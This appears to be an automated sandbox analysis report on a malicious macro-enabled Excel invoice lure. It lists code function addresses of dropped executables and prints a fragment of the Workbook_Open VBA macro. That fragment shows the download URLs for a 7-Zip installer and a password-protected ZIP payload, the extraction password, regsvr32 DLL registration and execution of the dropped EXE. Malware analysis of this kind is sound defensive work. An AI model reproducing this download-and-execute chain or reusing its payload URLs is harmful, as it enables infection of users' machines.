Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1013C250	6_2_00007FFD1013C250
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10120230	6_2_00007FFD10120230
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10192330	6_2_00007FFD10192330
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100EE760	6_2_00007FFD100EE760
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD101967D0	6_2_00007FFD101967D0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD101167E0	6_2_00007FFD101167E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10158820	6_2_00007FFD10158820
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10114A60	6_2_00007FFD10114A60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10160AE0	6_2_00007FFD10160AE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10158BE0	6_2_00007FFD10158BE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10190C50	6_2_00007FFD10190C50
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1014CCC0	6_2_00007FFD1014CCC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100F8E70	6_2_00007FFD100F8E70
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100FEE60	6_2_00007FFD100FEE60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1018EF40	6_2_00007FFD1018EF40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100FEF60	6_2_00007FFD100FEF60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103AF0E0	6_2_00007FFD103AF0E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103E11A0	6_2_00007FFD103E11A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10379320	6_2_00007FFD10379320
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1037B300	6_2_00007FFD1037B300
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103435B0	6_2_00007FFD103435B0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103536E0	6_2_00007FFD103536E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10349780	6_2_00007FFD10349780
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1037D950	6_2_00007FFD1037D950
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103E5B40	6_2_00007FFD103E5B40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10395AE0	6_2_00007FFD10395AE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10344020	6_2_00007FFD10344020
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103E2000	6_2_00007FFD103E2000
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103EA090	6_2_00007FFD103EA090
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103FA410	6_2_00007FFD103FA410
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10352540	6_2_00007FFD10352540
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103D6540	6_2_00007FFD103D6540
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10352640	6_2_00007FFD10352640
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103AE900	6_2_00007FFD103AE900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10390900	6_2_00007FFD10390900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1034CA40	6_2_00007FFD1034CA40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1033E9E0	6_2_00007FFD1033E9E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103E8A00	6_2_00007FFD103E8A00
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10344AA0	6_2_00007FFD10344AA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103E4AA0	6_2_00007FFD103E4AA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103E6BA0	6_2_00007FFD103E6BA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1033EBBF	6_2_00007FFD1033EBBF
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103EEC10	6_2_00007FFD103EEC10
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10378CA0	6_2_00007FFD10378CA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103D8C80	6_2_00007FFD103D8C80
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1037CD20	6_2_00007FFD1037CD20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10390900	6_2_00007FFD10390900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10352F20	6_2_00007FFD10352F20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103DEFC0	6_2_00007FFD103DEFC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD103D6FC0	6_2_00007FFD103D6FC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10350F60	6_2_00007FFD10350F60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFCB00ABBFB	8_2_00007FFCB00ABBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFCB0172E11	8_2_00007FFCB0172E11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_01700040	10_2_01700040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_01700D47	10_2_01700D47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_017302B8	10_2_017302B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_0173A528	10_2_0173A528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_0173A518	10_2_0173A518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_017374F2	10_2_017374F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_017374F8	10_2_017374F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDD278	10_2_02FDD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FD5370	10_2_02FD5370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDA088	10_2_02FDA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDC146	10_2_02FDC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FD7118	10_2_02FD7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDC738	10_2_02FDC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDC468	10_2_02FDC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDCA08	10_2_02FDCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FD69A0	10_2_02FD69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDE988	10_2_02FDE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FD3E09	10_2_02FD3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDCFAA	10_2_02FDCFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDCCD8	10_2_02FDCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FD29E0	10_2_02FD29E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDE97A	10_2_02FDE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_02FDF961	10_2_02FDF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B32A90	10_2_06B32A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B39668	10_2_06B39668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B31FA8	10_2_06B31FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3E378	10_2_06B3E378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B31850	10_2_06B31850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B39D90	10_2_06B39D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B35148	10_2_06B35148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3DAC3	10_2_06B3DAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3DAC8	10_2_06B3DAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3D218	10_2_06B3D218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3D670	10_2_06B3D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3D663	10_2_06B3D663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3965B	10_2_06B3965B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B31F9C	10_2_06B31F9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3E7D0	10_2_06B3E7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3E7CF	10_2_06B3E7CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B30B30	10_2_06B30B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3DF20	10_2_06B3DF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B30B20	10_2_06B30B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3DF1F	10_2_06B3DF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3E373	10_2_06B3E373
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B38CB1	10_2_06B38CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3F080	10_2_06B3F080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3F4D8	10_2_06B3F4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B38CC0	10_2_06B38CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3F4CB	10_2_06B3F4CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3EC28	10_2_06B3EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3EC1B	10_2_06B3EC1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B30006	10_2_06B30006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3F07B	10_2_06B3F07B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B31841	10_2_06B31841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B30040	10_2_06B30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3CDBB	10_2_06B3CDBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B39D8B	10_2_06B39D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3CDC0	10_2_06B3CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3F930	10_2_06B3F930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3513E	10_2_06B3513E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3F92B	10_2_06B3F92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06D03BA0	10_2_06D03BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BA10D8	10_2_08BA10D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BA0040	10_2_08BA0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BAA9D0	10_2_08BAA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BA10C7	10_2_08BA10C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BA0040	10_2_08BA0040
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FF6830A7ED0	22_2_00007FF6830A7ED0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FF6830A57C0	22_2_00007FF6830A57C0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FF6830A43E0	22_2_00007FF6830A43E0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE5EF40	22_2_00007FFD0EE5EF40
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDCEE60	22_2_00007FFD0EDCEE60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDC8E72	22_2_00007FFD0EDC8E72
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDCEF60	22_2_00007FFD0EDCEF60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE60C50	22_2_00007FFD0EE60C50
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE28BE0	22_2_00007FFD0EE28BE0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDC4A40	22_2_00007FFD0EDC4A40
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE28820	22_2_00007FFD0EE28820
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDE67E0	22_2_00007FFD0EDE67E0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE667D0	22_2_00007FFD0EE667D0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDBE760	22_2_00007FFD0EDBE760
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDC4640	22_2_00007FFD0EDC4640
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE62330	22_2_00007FFD0EE62330
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EECE120	22_2_00007FFD0EECE120
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE0C250	22_2_00007FFD0EE0C250
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDE9ED6	22_2_00007FFD0EDE9ED6
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDB3E9F	22_2_00007FFD0EDB3E9F
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDFBFF0	22_2_00007FFD0EDFBFF0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDBBCEE	22_2_00007FFD0EDBBCEE
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE2FC80	22_2_00007FFD0EE2FC80
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE5DC60	22_2_00007FFD0EE5DC60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE4FB40	22_2_00007FFD0EE4FB40
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE2B900	22_2_00007FFD0EE2B900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDC7860	22_2_00007FFD0EDC7860
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE65A20	22_2_00007FFD0EE65A20
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE5F9A0	22_2_00007FFD0EE5F9A0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDCF780	22_2_00007FFD0EDCF780
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE714B0	22_2_00007FFD0EE714B0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDE1656	22_2_00007FFD0EDE1656
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDF3620	22_2_00007FFD0EDF3620
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDBB5E7	22_2_00007FFD0EDBB5E7
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE5D5C0	22_2_00007FFD0EE5D5C0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE5F5C0	22_2_00007FFD0EE5F5C0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE2D280	22_2_00007FFD0EE2D280
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EE5F240	22_2_00007FFD0EE5F240
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F020F60	22_2_00007FFD0F020F60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0AEFC0	22_2_00007FFD0F0AEFC0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0A6FC0	22_2_00007FFD0F0A6FC0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F060900	22_2_00007FFD0F060900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F022F20	22_2_00007FFD0F022F20
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0A8C80	22_2_00007FFD0F0A8C80
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F048CA0	22_2_00007FFD0F048CA0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F04CD20	22_2_00007FFD0F04CD20
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0B6BA0	22_2_00007FFD0F0B6BA0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F00EBBF	22_2_00007FFD0F00EBBF
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0BEC10	22_2_00007FFD0F0BEC10
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F014AA0	22_2_00007FFD0F014AA0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0B4AA0	22_2_00007FFD0F0B4AA0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F00E9E0	22_2_00007FFD0F00E9E0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0B8A00	22_2_00007FFD0F0B8A00
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F01CA40	22_2_00007FFD0F01CA40
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F07E900	22_2_00007FFD0F07E900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F060900	22_2_00007FFD0F060900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F022640	22_2_00007FFD0F022640
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F022540	22_2_00007FFD0F022540
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0A6540	22_2_00007FFD0F0A6540
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0CA410	22_2_00007FFD0F0CA410
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0BA090	22_2_00007FFD0F0BA090
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0B2000	22_2_00007FFD0F0B2000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F014020	22_2_00007FFD0F014020
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F065AE0	22_2_00007FFD0F065AE0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0B5B40	22_2_00007FFD0F0B5B40
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F04D950	22_2_00007FFD0F04D950
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F019780	22_2_00007FFD0F019780
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0236E0	22_2_00007FFD0F0236E0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0135B0	22_2_00007FFD0F0135B0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F04B300	22_2_00007FFD0F04B300
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F049320	22_2_00007FFD0F049320
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F0B11A0	22_2_00007FFD0F0B11A0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F07F0E0	22_2_00007FFD0F07F0E0

Source: PO202503S.xlsm	OLE, VBA macro line: Private Sub Workbook_Open()
Source: PO202503S.xlsm	OLE, VBA macro line: Private Sub Workbook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Workbook_Open	Name: Workbook_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open	Name: Workbook_Open

Source: PO202503S.xlsm

OLE indicator, VBA macros: true

Source: PO202503S.xlsm

Stream path 'VBA/__SRP_0' : https://tursiian.com/7z.txt$7zip_installer.exe/S47-Zip installation failed!8ZIP file failed to download!2(7-Zip installed at:* 7-Zip found at:,$PO202502SNAKWS.zip"|https://f004.backblazeb2.com/file/mdocument/PO202502SNAKWS.zi|&ZIP downloaded to:* x -p123456 -y -oba).a(Extraction command:$*.*"Extracted files:$,,libcares-2.dll"nasrallah_x86.dll vcruntime210.dll$PO202502SNAKWS.exe"-#Z00:00:010c.EXE execution attempted.aFF!1Q1&mQ1@nasrallah_x86.dll not found at:*WScript.Shell2QRetry(: DLL exists=, EXE exists=:libcares-2.dll not found at: 6msvcp290.dll not found at:$@2iw<WYl|>vcruntime210.dll not found at: >PO202502SNAK.exe not found at:* Files verified:$ and(regsvr32.exe/s.2DLL registration output: LDLL registration attempted (no output)EXE output:"Run<Z>Z"Cleanup c

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe A52E245DD7937094711B10C479274A2CCCEA2DFB89F7D4C9F22879214718F92B
Source: Joe Sandbox View	Dropped File: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe A52E245DD7937094711B10C479274A2CCCEA2DFB89F7D4C9F22879214718F92B

Source: C:\Program Files\7-Zip\7z.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: String function: 00007FFD0EED52E0 appears 317 times
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: String function: 00007FFD0EE6EC60 appears 67 times
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: String function: 00007FFD0F0C69F0 appears 3390 times
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: String function: 00007FFD0F0C7BC0 appears 58 times
